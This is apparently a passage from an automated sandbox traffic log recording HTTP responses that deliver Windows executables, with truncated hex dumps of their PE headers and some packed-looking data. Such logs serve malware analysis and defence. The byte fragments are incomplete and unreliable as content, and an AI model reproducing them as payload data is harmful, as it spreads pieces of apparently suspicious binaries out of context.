00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:54 GMTContent-Type: application/octet-streamContent-Length: 414248Last-Modified: Mon, 30 Sep 2024 04:37:16 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2afc-65228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 22 06 00 00 08 00 00 00 00 00 00 4e 40 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 06 00 4b 00 00 00 00 60 06 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 2c 06 00 28 26 00 00 00 80 06 00 0c 00 00 00 c8 3e 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 20 06 00 00 20 00 00 00 22 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 60 06 00 00 06 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 06 00 00 02 00 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 06 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 2e 06 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 dc 3b 9f 38 e4 60 f0 c6 77 a2 a5 08 0f e5 a0 19 86 ff d4 8b 72 8b 62 1a 84 93 8a e4 20 c2 ed 43 04 47 41 ba f2 7e 7a 78 46 ae 63 c0 40 51 65 ff b9 38 88 d6 05 c1 93 38 24 d9 ec 61 f5 87 e5 87 93 4e f9 1d 21 51 1e 34 66 b5 13 c6 9a 5c 0e 84 ea 1a b4 64 df 14 61 ad 9e 65 39 34 05 db d7 5e 51 2a 38 66 a9 76 e5 02 07 e4 77 e3 57 1c c6 77 48 09 6b 51 f2 f1 1b 2c d2 db bd 33 c3 41 24 23 b9 e0 d8 50 16 8c 9c e2 87 b4 29 cf f4 53 d0 8b ee 6f 81 91 e8 62 2b 67 59 7f 5c 6f ae 8e b1 f0 d1 35 84 6d e5 29 ea 1d 32 1b 74 cc ab 35 d7 43 a6 c5 26 7a 37 ad 89 9d 1d 2d 8f 44 db 9e d9 c5 b8 71 21 11 b8 d6 8e 1f 8f 6f dc f4 e7 a3 b7 14 ba 07 84 d9 57 32 46 9c cb f4 6e 3b bb ee 7e 8a 39 2e 92 c7 e5 09 71 34 18 6c 9e 56 96 0f c6 4f 0c 70 18 6c dc f5 6d 7d e3 a0 27 d3 c4 cf 3a d1 97 45 b9 f6 cb bd e6 99 2f 25 32 ff fb b7 5f 01 c8 67 05 ca c0 3d 19 37 7f 0a d1 e8 96 f6 cf b7 fa 6d 8b 84 e8 d4 e2 1c dc b6 30 5e 87 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:54 GMTContent-Type: application/octet-streamContent-Length: 380456Last-Modified: Mon, 30 Sep 2024 04:37:24 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2b04-5ce28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 05 00 00 08 00 00 00 00 00 00 4e bc 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 bc 05 00 4b 00 00 00 00 c0 05 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 a8 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 c8 ba 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 9c 05 00 00 20 00 00 00 9e 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 c0 05 00 00 06 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 bc 05 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 aa 05 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 58 f1 31 35 d1 e9 51 1a 14 54 9d 77 7b a3 ef 8c 05 fa a9 ca 06 9a b3 9a d5 76 5e 00 22 df fa eb 06 53 a5 d7 8f ee b6 30 5a 6f bc ef 58 93 ac b7 96 f8 15 7c 83 a1 da 8c c7 f3 b1 bf 6f 88 94 d4 a0 41 53 b4 e8 44 a2 12 a6 6e f0 f4 45 0f 65 b6 f7 e2 35 5f f7 30 1b ba 95 ad ae 45 f9 84 06 03 41 aa 9a 85 ab b7 3b bb fa 01 0c 24 dc 33 a6 5a d8 ba 21 68 3b c7 25 16 bc 0f 0b 72 3b 47 0a 8c 75 18 13 f4 52 80 8b 07 24 27 b9 39 d0 b0 ce f2 c7 56 0b 8b 37 02 4f 3f 14 43 92 dd 3a fb 16 fd b4 7c e9 e5 cd 2c 60 32 76 71 85 32 74 be 58 2f 06 67 3d 5e 